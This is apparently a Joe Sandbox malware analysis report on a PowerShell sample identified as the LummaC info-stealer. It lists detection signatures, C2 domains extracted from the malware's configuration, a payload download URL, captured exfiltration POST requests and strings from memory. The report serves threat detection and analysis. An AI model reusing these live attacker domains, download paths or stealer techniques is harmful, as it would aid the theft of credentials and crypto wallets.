Edit tour

Windows Analysis Report
sus.ps1

Overview

General Information

Sample name:	sus.ps1
Analysis ID:	1559357
MD5:	1cf7079cb5381c91a928ce8eb2757e6e
SHA1:	1f75a9c304c39b5c762ffad595f648e38f260fa5
SHA256:	8514c966bedb00efc1d8d99bd0dca4a0183807988964d896b741780a4cbd4543
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for dropped file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Powershell drops PE file

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

powershell.exe (PID: 2664 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\sus.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

bubs.exe (PID: 4140 cmdline: "C:\Users\user\AppData\Roaming\Extra\bubs.exe" MD5: 442D526A26805C47376D7B4F78374A4F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["p3ar11fter.sbs", "3xp3cts1aim.sbs", "p10tgrace.sbs", "processhol.sbs", "appr0dress.cyou", "peepburry828.sbs"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: bubs.exe PID: 4140	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: bubs.exe PID: 4140	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: bubs.exe PID: 4140	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\sus.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\sus.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\sus.ps1", ProcessId: 2664, ProcessName: powershell.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2664, TargetFilename: C:\Users\user\AppData\Roaming\Extra\cr.dll

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\sus.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\sus.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\sus.ps1", ProcessId: 2664, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T12:39:05.318740+0100	2028371	3	Unknown Traffic	192.168.2.6	49774	188.114.96.3	443	TCP
2024-11-20T12:39:06.867010+0100	2028371	3	Unknown Traffic	192.168.2.6	49785	188.114.96.3	443	TCP
2024-11-20T12:39:08.559667+0100	2028371	3	Unknown Traffic	192.168.2.6	49797	188.114.96.3	443	TCP
2024-11-20T12:39:09.791218+0100	2028371	3	Unknown Traffic	192.168.2.6	49805	188.114.96.3	443	TCP
2024-11-20T12:39:11.111269+0100	2028371	3	Unknown Traffic	192.168.2.6	49816	188.114.96.3	443	TCP
2024-11-20T12:39:13.386872+0100	2028371	3	Unknown Traffic	192.168.2.6	49833	188.114.96.3	443	TCP
2024-11-20T12:39:14.805694+0100	2028371	3	Unknown Traffic	192.168.2.6	49844	188.114.96.3	443	TCP
2024-11-20T12:39:16.450506+0100	2028371	3	Unknown Traffic	192.168.2.6	49855	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T12:39:06.277618+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49774	188.114.96.3	443	TCP
2024-11-20T12:39:07.898289+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49785	188.114.96.3	443	TCP
2024-11-20T12:39:16.840167+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49855	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T12:39:06.277618+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49774	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T12:39:07.898289+0100	2049812	1	A Network Trojan was detected	192.168.2.6	49785	188.114.96.3	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T12:39:09.081508+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	49797	188.114.96.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://appr0dress.cyou/api	Avira URL Cloud: Label: malware
Source: https://jerseysurffilmfestival.com/wakena.zip	Avira URL Cloud: Label: malware
Source: https://jerseysurffilmfestival.com	Avira URL Cloud: Label: malware
Source: https://appr0dress.cyou:443/api	Avira URL Cloud: Label: malware
Source: http://jerseysurffilmfestival.com	Avira URL Cloud: Label: malware
Source: https://iplogger.co/1twXC4	Avira URL Cloud: Label: phishing

Found malware configuration

Source: 3.2.bubs.exe.6c530000.2.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["p3ar11fter.sbs", "3xp3cts1aim.sbs", "p10tgrace.sbs", "processhol.sbs", "appr0dress.cyou", "peepburry828.sbs"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Roaming\Extra\cr.dll	ReversingLabs: Detection: 16%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.2417337499.000000006C9BF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: p3ar11fter.sbs
Source: 00000003.00000002.2417337499.000000006C9BF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: 3xp3cts1aim.sbs
Source: 00000003.00000002.2417337499.000000006C9BF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: peepburry828.sbs
Source: 00000003.00000002.2417337499.000000006C9BF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: p10tgrace.sbs
Source: 00000003.00000002.2417337499.000000006C9BF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: processhol.sbs
Source: 00000003.00000002.2417337499.000000006C9BF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: appr0dress.cyou
Source: 00000003.00000002.2417337499.000000006C9BF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.2417337499.000000006C9BF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.2417337499.000000006C9BF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: - Screen Resoluton:
Source: 00000003.00000002.2417337499.000000006C9BF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.2417337499.000000006C9BF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: Workgroup: -

Source: unknown	HTTPS traffic detected: 185.61.154.28:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.167.249:443 -> 192.168.2.6:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49833 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49855 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49774 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49774 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49785 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49785 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49797 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49855 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: p3ar11fter.sbs
Source: Malware configuration extractor	URLs: 3xp3cts1aim.sbs
Source: Malware configuration extractor	URLs: p10tgrace.sbs
Source: Malware configuration extractor	URLs: processhol.sbs
Source: Malware configuration extractor	URLs: appr0dress.cyou
Source: Malware configuration extractor	URLs: peepburry828.sbs

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 172.67.167.249 172.67.167.249

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown

DNS query: name: iplogger.co

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49774 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49797 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49805 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49785 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49833 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49855 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49816 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49844 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: GET /wakena.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: jerseysurffilmfestival.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1twXC4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: iplogger.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: appr0dress.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: appr0dress.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KT2GK415IYJ4LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12834Host: appr0dress.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5815TOUR55MD2GJJFDNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15116Host: appr0dress.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BVCOQ7H6XG07User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19932Host: appr0dress.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4NPGF6U3BSRNKTYNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1234Host: appr0dress.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EIKPOMS7Z5DVXKATN2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 222068Host: appr0dress.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: appr0dress.cyou

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /wakena.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: jerseysurffilmfestival.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1twXC4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: iplogger.coConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: jerseysurffilmfestival.com
Source: global traffic	DNS traffic detected: DNS query: iplogger.co
Source: global traffic	DNS traffic detected: DNS query: appr0dress.cyou

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: appr0dress.cyou

Source: bubs.exe, 00000003.00000003.2350461997.000000000403D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bubs.exe, 00000003.00000003.2350461997.000000000403D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bubs.exe, 00000003.00000003.2414209775.0000000000F9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: bubs.exe, 00000003.00000003.2350461997.000000000403D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: bubs.exe, 00000003.00000003.2350461997.000000000403D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bubs.exe, 00000003.00000003.2350461997.000000000403D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bubs.exe, 00000003.00000003.2350461997.000000000403D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bubs.exe, 00000003.00000003.2350461997.000000000403D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: powershell.exe, 00000001.00000002.2436521329.000001E41B8E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://iplogger.co
Source: powershell.exe, 00000001.00000002.2436521329.000001E41B39B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jerseysurffilmfestival.com
Source: powershell.exe, 00000001.00000002.2456915849.000001E42995F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2456915849.000001E429AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: bubs.exe, 00000003.00000003.2350461997.000000000403D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: bubs.exe, 00000003.00000003.2350461997.000000000403D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000001.00000002.2436521329.000001E419B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2436521329.000001E4198F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2436521329.000001E419B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: bubs.exe, 00000003.00000003.2350461997.000000000403D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: bubs.exe, 00000003.00000003.2350461997.000000000403D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: bubs.exe, 00000003.00000003.2326379310.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326205569.0000000003F7F000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326253410.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000001.00000002.2436521329.000001E4198F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: bubs.exe, 00000003.00000002.2415362425.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, bubs.exe, 00000003.00000002.2415661139.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2414209775.0000000000F9C000.00000004.00000020.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2414247624.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://appr0dress.cyou/
Source: bubs.exe, 00000003.00000002.2415661139.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2414209775.0000000000F9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://appr0dress.cyou/7
Source: bubs.exe, 00000003.00000002.2415362425.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://appr0dress.cyou/api
Source: bubs.exe, 00000003.00000003.2414247624.0000000000F48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://appr0dress.cyou:443/api
Source: bubs.exe, 00000003.00000003.2352033803.0000000003F47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: bubs.exe, 00000003.00000003.2352033803.0000000003F47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: bubs.exe, 00000003.00000003.2326379310.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326205569.0000000003F7F000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326253410.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: bubs.exe, 00000003.00000003.2326379310.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326205569.0000000003F7F000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326253410.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: bubs.exe, 00000003.00000003.2326379310.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326205569.0000000003F7F000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326253410.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: bubs.exe, 00000003.00000003.2352033803.0000000003F47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: bubs.exe, 00000003.00000003.2352033803.0000000003F47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 00000001.00000002.2456915849.000001E429AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2456915849.000001E429AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2456915849.000001E429AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: bubs.exe, 00000003.00000003.2326379310.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326205569.0000000003F7F000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326253410.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: bubs.exe, 00000003.00000003.2326379310.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326205569.0000000003F7F000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326253410.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: bubs.exe, 00000003.00000003.2326379310.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326205569.0000000003F7F000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326253410.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000001.00000002.2436521329.000001E419B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2436521329.000001E41AF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: bubs.exe, 00000003.00000003.2352033803.0000000003F47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: powershell.exe, 00000001.00000002.2436521329.000001E41B8C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2436521329.000001E419D5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.co
Source: powershell.exe, 00000001.00000002.2436521329.000001E41B952000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.co/
Source: powershell.exe, 00000001.00000002.2436521329.000001E419B18000.00000004.00000800.00020000.00000000.sdmp, sus.ps1	String found in binary or memory: https://iplogger.co/1twXC4
